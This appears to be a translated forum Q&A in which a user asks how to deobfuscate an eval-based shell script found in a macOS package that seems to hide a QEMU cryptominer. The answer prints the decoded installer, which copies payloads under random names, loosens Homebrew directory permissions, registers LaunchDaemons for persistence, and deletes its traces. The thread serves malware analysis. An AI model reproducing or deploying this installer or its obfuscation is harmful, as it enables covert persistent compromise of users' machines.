软件包中包含恶意混淆的外壳代码。有什么方法可以消除混淆吗?

时间:2019-06-07 19:03:13

标签: bash shell sh eval

在防火墙触发传入连接后,我开始分析PKG文件,它看起来像使用QEMU Emulator的某种隐藏的比特币矿工。 对该软件包进行反编译之后,我发现了一些.SH脚本,但看起来它已被bash-obfuscate Node.js CLI实用程序加密。 我一直在寻找对代码进行模糊处理的方法,并查看实际发生的事情,但没有找到任何答案。 希望这里的人有更多的见识!

在SH文件之一中找到的代码:

z="
";REz='bin/';nDz='al/b';jDz='$z1';Ez=' -pr';YCz='mewo';KGz='ad -';SCz='R ad';Kz='F. '\''';iEz='1111';kFz='list';sFz='z22/';NFz='hDae';ABz='Volu';wz='dmg';eBz='usr/';DBz='alle';UCz='al/C';uCz='"$( ';KFz='t /L';sBz='unct';QDz='wd  ';ZDz='3="$';bz='" |w';sEz='\ Su';Fz='oduc';xEz='/CCC';OGz='wd';pEz='/App';ZFz='om.$';az='=hvf';tCz='z11=';OCz='logn';LGz='w /L';wBz='5 /u';kCz='$( /';LBz='rdat';IGz='chct';fCz='/sit';gFz='Daem';vFz='333.';TGz='cow2';xz='cp -';fFz='unch';ZBz=' /us';VBz='/bin';XEz='atio';lz='til ';gBz='l/Fr';fz=' $CH';cDz='ibra';Sz='name';PDz='rand';WFz='nchD';KEz='$z2/';WBz='/chm';aFz='1.pl';iz=']';ez='if [';TEz=' /Li';CDz='="$(';oz='nove';DCz='l/sh';fEz='" "s';GGz='$z33';iBz='orks';iFz='com.';CCz='sh /';xBz='sr/l';XBz='od g';TBz='s/In';mEz='1/" ';MEz='/z3 ';Hz='sion';uBz='od -';JFz='plis';ODz='red/';FFz='2/" ';LCz='n/ch';tEz='ppor';IFz='222/';dEz='sed ';xFz='3.pl';JBz='ch $';VGz='z3.p';yz='pR /';HBz='al/';AFz='/DDD';yDz=' Sup';uFz='.$z3';OEz='chmo';GFz='2/$z';yCz='ndwd';dz='`';XCz='/Fra';oEz='rary';Pz='all_';SDz='z2="';mFz='z11/';Cz='(sw_';wEz='11';eFz='y/La';ZEz='uppo';sDz='on /';UDz='z222';qBz='h/si';NCz='-R `';EBz='r/* ';Xz='|gre';tBz='ions';HCz='-fun';Az='osve';GBz='/loc';eEz='-i "';Vz='`ps ';gEz='/AAA';rDz='daem';Wz='aux ';qEz='lica';eDz='ppli';JEz='2';oCz='/ran';PEz='d -R';jCz='z1="';qz=' $in';fDz='cati';SFz='t';KDz='1="$';WGz='fi';yFz='z33/';IDz='d  )';OFz='mons';tDz='Libr';yBz='ocal';Yz='p "a';QBz='orce';gz='K -e';EDz='ers/';IBz='deta';SEz='Chmo';QCz='/chg';TCz='min ';nz='ch -';qFz='z2/"';Iz=' | a';RGz='z1.p';pBz='e/zs';dCz='in /';nCz='ared';QEz=' 700';cBz='Cell';DGz='11/$';DEz='qcow';nEz='/Lib';HFz='22';NGz='f /U';YFz='ns/c';rCz='ware';BCz='re/z';GCz='site';mz='atta';DDz=' /Us';CGz='/z11';YBz='+rwx';cFz='/TR3';bBz='cal/';sz='l_di';mCz='s/Sh';MDz='sers';aBz='r/lo';lDz='cp /';WDz='z3="';MBz='a.dm';ACz='/sha';JGz='l lo';FGz='22/$';vCz='/Use';tFz='/z3.';jFz='11.p';aCz='al/o';BEz='/$z1';vz='ata.';qCz='Soft';yEz='C/$z';BFz='D/$z';hBz='amew';vEz='1/$z';Mz='nt $';bDz='r /L';MCz='own ';EEz='2 /L';pCz='dwd ';Dz='vers';GDz='ed/r';Jz='wk -';Zz='ccel';RBz=' /Vo';LEz='$z22';rEz='tion';EFz='2222';Nz='2}'\'')';CFz='111/';Uz='CHK=';hFz='ons/';TDz='z22=';xDz='ion\';UEz='brar';AEz='port';QGz='n';KCz='/sbi';PFz='/com';dDz='ry/A';VCz='ella';mDz='/z1 ';UFz='00/$';gCz='e-fu';Bz='rs=$';jBz='opt ';bFz='ist';XDz='z33=';HGz='laun';BBz='mes/';NDz='/Sha';iDz='ort/';XFz='aemo';tz='r/in';GEz='$z11';Tz=' $0`';LDz='( /U';pFz='2.pl';nBz='/zsh';JDz='"';cEz='z2/';hDz='Supp';aEz='rt/$';CEz='1';Rz='`dir';FBz='/usr';MGz='rm -';wCz='rs/S';UGz='z3';BGz='4 /L';HDz='andw';nFz='.$z2';lCz='User';AGz='d 64';YEz='n\ S';ADz='  )"';gDz='on\ ';QFz='.$z1';sCz=' )"';ECz='are/';lEz='B/$z';iCz='ons';xCz='d/ra';wFz='3/" ';KBz='dir/';bCz='pt /';qDz='/z1.';ZCz='rks ';hCz='ncti';bEz='z1/';jEz='/" /';MFz='aunc';DFz='" /L';ICz='ctio';dFz='z1/"';aDz='mkdi';lBz='bin ';RDz=')"';SGz='z1.q';eCz='zsh ';rBz='te-f';Oz='inst';FCz='zsh/';RFz='111.';oDz='in/$';dBz='ar /';NBz='g';YDz='z333';CBz='Inst';kBz='al/s';SBz='lume';kEz='/BBB';VDz='2="$';NEz='z33';PCz='ame`';PBz='t -f';pz='rify';RCz='rp -';WCz='r /u';cCz='l/sb';FEz='$z1/';wDz='icat';VFz='/Lau';TFz='/ZY1';lFz='/TR2';mBz='hare';fBz='loca';Lz='{pri';kDz='$z2';cz='c -l';HEz='z2';oFz='222.';VEz='y/Ap';IEz='/$z2';jz='then';pDz='z1';BDz='z111';Qz='dir=';uEz='t/$z';uDz='ary/';JCz='ns';rz='stal';OBz='ejec';LFz='ry/L';Gz='tVer';UBz='ler';kz='hdiu';hz='q 1 ';oBz='shar';EGz='/z22';hEz='A/$z';vDz='Appl';FDz='Shar';PGz='z1.d';uz='lerd';rFz='22.p';vBz='R 75';WEz='plic';
eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$z$Oz$Pz$Qz$Rz$Sz$Tz$z$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$z$ez$fz$gz$hz$iz$z$jz$z$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$rz$uz$vz$wz$z$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$z$kz$lz$IBz$JBz$Oz$Pz$KBz$Oz$DBz$LBz$MBz$NBz$z$kz$lz$OBz$PBz$QBz$RBz$SBz$TBz$rz$UBz$z$VBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$hBz$iBz$ZBz$aBz$bBz$jBz$FBz$GBz$kBz$lBz$FBz$GBz$kBz$mBz$nBz$ZBz$aBz$bBz$oBz$pBz$qBz$rBz$sBz$tBz$z$VBz$WBz$uBz$vBz$wBz$xBz$yBz$ACz$BCz$CCz$eBz$fBz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$z$FBz$KCz$LCz$MCz$NCz$OCz$PCz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$hBz$iBz$ZBz$aBz$bBz$jBz$FBz$GBz$kBz$lBz$FBz$GBz$kBz$mBz$nBz$ZBz$aBz$bBz$oBz$pBz$qBz$rBz$sBz$tBz$z$FBz$VBz$QCz$RCz$SCz$TCz$FBz$GBz$UCz$VCz$WCz$xBz$yBz$XCz$YCz$ZCz$FBz$GBz$aCz$bCz$eBz$fBz$cCz$dCz$eBz$fBz$DCz$ECz$eCz$FBz$GBz$kBz$mBz$nBz$fCz$gCz$hCz$iCz$z$jCz$kCz$lCz$mCz$nCz$oCz$pCz$qCz$rCz$sCz$z$tCz$uCz$vCz$wCz$mBz$xCz$yCz$ADz$z$BDz$CDz$DDz$EDz$FDz$GDz$HDz$IDz$JDz$z$BDz$KDz$LDz$MDz$NDz$ODz$PDz$QDz$RDz$z$SDz$kCz$lCz$mCz$nCz$oCz$pCz$qCz$rCz$sCz$z$TDz$uCz$vCz$wCz$mBz$xCz$yCz$ADz$z$UDz$CDz$DDz$EDz$FDz$GDz$HDz$IDz$JDz$z$UDz$VDz$LDz$MDz$NDz$ODz$PDz$QDz$RDz$z$WDz$kCz$lCz$mCz$nCz$oCz$pCz$sCz$z$XDz$uCz$vCz$wCz$mBz$xCz$yCz$ADz$z$YDz$ZDz$LDz$MDz$NDz$ODz$PDz$QDz$RDz$z$aDz$bDz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$jDz$z$aDz$bDz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$kDz$z$lDz$lCz$mCz$nCz$mDz$FBz$GBz$nDz$oDz$pDz$z$lDz$lCz$mCz$nCz$qDz$rDz$sDz$tDz$uDz$vDz$wDz$xDz$yDz$AEz$BEz$BEz$CEz$z$lDz$lCz$mCz$nCz$qDz$DEz$EEz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$FEz$GEz$CEz$z$lDz$lCz$mCz$nCz$mDz$FBz$GBz$nDz$oDz$HEz$z$lDz$lCz$mCz$nCz$qDz$rDz$sDz$tDz$uDz$vDz$wDz$xDz$yDz$AEz$IEz$IEz$JEz$z$lDz$lCz$mCz$nCz$qDz$DEz$EEz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$KEz$LEz$JEz$z$lDz$lCz$mCz$nCz$MEz$FBz$GBz$nDz$oDz$NEz$z$OEz$PEz$QEz$ZBz$aBz$bBz$REz$jDz$z$OEz$PEz$QEz$ZBz$aBz$bBz$REz$kDz$z$SEz$PEz$QEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$SEz$PEz$QEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$cEz$z$dEz$eEz$fEz$gEz$hEz$iEz$jEz$tDz$uDz$vDz$wDz$xDz$yDz$AEz$BEz$BEz$CEz$z$dEz$eEz$fEz$kEz$lEz$mEz$nEz$oEz$pEz$qEz$rEz$sEz$tEz$uEz$vEz$wEz$z$dEz$eEz$fEz$xEz$yEz$mEz$nEz$oEz$pEz$qEz$rEz$sEz$tEz$uEz$vEz$wEz$z$dEz$eEz$fEz$AFz$BFz$CFz$DFz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$FEz$GEz$z$dEz$eEz$fEz$gEz$hEz$EFz$jEz$tDz$uDz$vDz$wDz$xDz$yDz$AEz$IEz$IEz$JEz$z$dEz$eEz$fEz$kEz$lEz$FFz$nEz$oEz$pEz$qEz$rEz$sEz$tEz$uEz$GFz$HFz$z$dEz$eEz$fEz$xEz$yEz$FFz$nEz$oEz$pEz$qEz$rEz$sEz$tEz$uEz$GFz$HFz$z$dEz$eEz$fEz$AFz$BFz$IFz$DFz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$KEz$LEz$z$lDz$lCz$mCz$nCz$qDz$JFz$KFz$cDz$LFz$MFz$NFz$OFz$PFz$QFz$RFz$JFz$SFz$z$dEz$eEz$fEz$TFz$UFz$BDz$mEz$nEz$oEz$VFz$WFz$XFz$YFz$ZFz$BDz$aFz$bFz$z$dEz$eEz$fEz$cFz$UFz$dFz$TEz$UEz$eFz$fFz$gFz$hFz$iFz$GEz$jFz$kFz$z$dEz$eEz$fEz$lFz$UFz$mFz$DFz$cDz$LFz$MFz$NFz$OFz$PFz$QFz$RFz$JFz$SFz$z$lDz$lCz$mCz$nCz$qDz$JFz$KFz$cDz$LFz$MFz$NFz$OFz$PFz$nFz$oFz$JFz$SFz$z$dEz$eEz$fEz$TFz$UFz$UDz$FFz$nEz$oEz$VFz$WFz$XFz$YFz$ZFz$UDz$pFz$bFz$z$dEz$eEz$fEz$cFz$UFz$qFz$TEz$UEz$eFz$fFz$gFz$hFz$iFz$LEz$rFz$kFz$z$dEz$eEz$fEz$lFz$UFz$sFz$DFz$cDz$LFz$MFz$NFz$OFz$PFz$nFz$oFz$JFz$SFz$z$lDz$lCz$mCz$nCz$tFz$JFz$KFz$cDz$LFz$MFz$NFz$OFz$PFz$uFz$vFz$JFz$SFz$z$dEz$eEz$fEz$TFz$UFz$YDz$wFz$nEz$oEz$VFz$WFz$XFz$YFz$ZFz$YDz$xFz$bFz$z$dEz$eEz$fEz$lFz$UFz$yFz$DFz$cDz$LFz$MFz$NFz$OFz$PFz$uFz$vFz$JFz$SFz$z$OEz$AGz$BGz$cDz$LFz$MFz$NFz$OFz$PFz$QFz$RFz$JFz$SFz$z$OEz$AGz$BGz$cDz$LFz$MFz$NFz$OFz$PFz$nFz$oFz$JFz$SFz$z$OEz$AGz$BGz$cDz$LFz$MFz$NFz$OFz$PFz$uFz$vFz$JFz$SFz$z$dEz$eEz$fEz$CGz$DGz$BDz$mEz$FBz$GBz$nDz$oDz$NEz$z$dEz$eEz$fEz$EGz$FGz$UDz$FFz$FBz$GBz$nDz$oDz$NEz$z$OEz$PEz$QEz$ZBz$aBz$bBz$REz$GGz$z$HGz$IGz$JGz$KGz$LGz$cDz$LFz$MFz$NFz$OFz$PFz$QFz$RFz$JFz$SFz$z$HGz$IGz$JGz$KGz$LGz$cDz$LFz$MFz$NFz$OFz$PFz$nFz$oFz$JFz$SFz$z$HGz$IGz$JGz$KGz$LGz$cDz$LFz$MFz$NFz$OFz$PFz$uFz$vFz$JFz$SFz$z$MGz$NGz$MDz$NDz$ODz$PDz$OGz$z$MGz$NGz$MDz$NDz$ODz$pDz$z$MGz$NGz$MDz$NDz$ODz$PGz$XFz$QGz$z$MGz$NGz$MDz$NDz$ODz$RGz$kFz$z$MGz$NGz$MDz$NDz$ODz$SGz$TGz$z$MGz$NGz$MDz$NDz$ODz$UGz$z$MGz$NGz$MDz$NDz$ODz$VGz$kFz$z$WGz"

1 个答案:

答案 0 :(得分:1)

嵌入的代码是:

osvers=$(sw_vers -productVersion | awk -F. '\''{print $2}'\'')
install_dir=`dirname $0`
CHK=`ps aux |grep "accel=hvf" |wc -l`
if [ $CHK -eq 1 ]
then
hdiutil attach -noverify $install_dir/installerdata.dmg
cp -pR /Volumes/Installer/* /usr/local/
hdiutil detach $install_dir/installerdata.dmg
hdiutil eject -force /Volumes/Installer
/bin/chmod g+rwx /usr/local/Cellar /usr/local/Frameworks /usr/local/opt /usr/local/sbin /usr/local/share/zsh /usr/local/share/zsh/site-functions
/bin/chmod -R 755 /usr/local/share/zsh /usr/local/share/zsh/site-functions
/usr/sbin/chown -R `logname` /usr/local/Cellar /usr/local/Frameworks /usr/local/opt /usr/local/sbin /usr/local/share/zsh /usr/local/share/zsh/site-functions
/usr/bin/chgrp -R admin /usr/local/Cellar /usr/local/Frameworks /usr/local/opt /usr/local/sbin /usr/local/share/zsh /usr/local/share/zsh/site-functions
z1="$( /Users/Shared/randwd Software )"
z11="$( /Users/Shared/randwd  )"
z111="$( /Users/Shared/randwd  )"
z1111="$( /Users/Shared/randwd  )"
z2="$( /Users/Shared/randwd Software )"
z22="$( /Users/Shared/randwd  )"
z222="$( /Users/Shared/randwd  )"
z2222="$( /Users/Shared/randwd  )"
z3="$( /Users/Shared/randwd  )"
z33="$( /Users/Shared/randwd  )"
z3333="$( /Users/Shared/randwd  )"
mkdir /Library/Application\ Support/$z1
mkdir /Library/Application\ Support/$z2
cp /Users/Shared/z1 /usr/local/bin/$z1
cp /Users/Shared/z1.daemon /Library/Application\ Support/$z1/$z11
cp /Users/Shared/z1.qcow2 /Library/Application\ Support/$z1/$z111
cp /Users/Shared/z1 /usr/local/bin/$z2
cp /Users/Shared/z1.daemon /Library/Application\ Support/$z2/$z22
cp /Users/Shared/z1.qcow2 /Library/Application\ Support/$z2/$z222
cp /Users/Shared/z3 /usr/local/bin/$z33
chmod -R 700 /usr/local/bin/$z1
chmod -R 700 /usr/local/bin/$z2
Chmod -R 700 /Library/Application\ Support/$z1/
Chmod -R 700 /Library/Application\ Support/$z2/
sed -i "" "s/AAAA/$z1111/" /Library/Application\ Support/$z1/$z11
sed -i "" "s/BBBB/$z1/" /Library/Application\ Support/$z1/$z11
sed -i "" "s/CCCC/$z1/" /Library/Application\ Support/$z1/$z11
sed -i "" "s/DDDD/$z111/" /Library/Application\ Support/$z1/$z11
sed -i "" "s/AAAA/$z2222/" /Library/Application\ Support/$z2/$z22
sed -i "" "s/BBBB/$z2/" /Library/Application\ Support/$z2/$z22
sed -i "" "s/CCCC/$z2/" /Library/Application\ Support/$z2/$z22
sed -i "" "s/DDDD/$z222/" /Library/Application\ Support/$z2/$z22
cp /Users/Shared/z1.plist /Library/LaunchDaemons/com.$z1111.plist
sed -i "" "s/ZY100/$z1111/" /Library/LaunchDaemons/com.$z1111.plist
sed -i "" "s/TR300/$z1/" /Library/LaunchDaemons/com.$z1111.plist
sed -i "" "s/TR200/$z11/" /Library/LaunchDaemons/com.$z1111.plist
cp /Users/Shared/z1.plist /Library/LaunchDaemons/com.$z2222.plist
sed -i "" "s/ZY100/$z2222/" /Library/LaunchDaemons/com.$z2222.plist
sed -i "" "s/TR300/$z2/" /Library/LaunchDaemons/com.$z2222.plist
sed -i "" "s/TR200/$z22/" /Library/LaunchDaemons/com.$z2222.plist
cp /Users/Shared/z3.plist /Library/LaunchDaemons/com.$z3333.plist
sed -i "" "s/ZY100/$z3333/" /Library/LaunchDaemons/com.$z3333.plist
sed -i "" "s/TR200/$z33/" /Library/LaunchDaemons/com.$z3333.plist
chmod 644 /Library/LaunchDaemons/com.$z1111.plist
chmod 644 /Library/LaunchDaemons/com.$z2222.plist
chmod 644 /Library/LaunchDaemons/com.$z3333.plist
sed -i "" "s/z1111/$z1111/" /usr/local/bin/$z33
sed -i "" "s/z2222/$z2222/" /usr/local/bin/$z33
chmod -R 700 /usr/local/bin/$z33
launchctl load -w /Library/LaunchDaemons/com.$z1111.plist
launchctl load -w /Library/LaunchDaemons/com.$z2222.plist
launchctl load -w /Library/LaunchDaemons/com.$z3333.plist
rm -f /Users/Shared/randwd
rm -f /Users/Shared/z1
rm -f /Users/Shared/z1.daemon
rm -f /Users/Shared/z1.plist
rm -f /Users/Shared/z1.qcow2
rm -f /Users/Shared/z3
rm -f /Users/Shared/z3.plist
fi

如果您想启用第三方分析,也许将那个.qcow2文件(甚至来自它的installer.dmg文件)放在某个地方?

相关问题
最新问题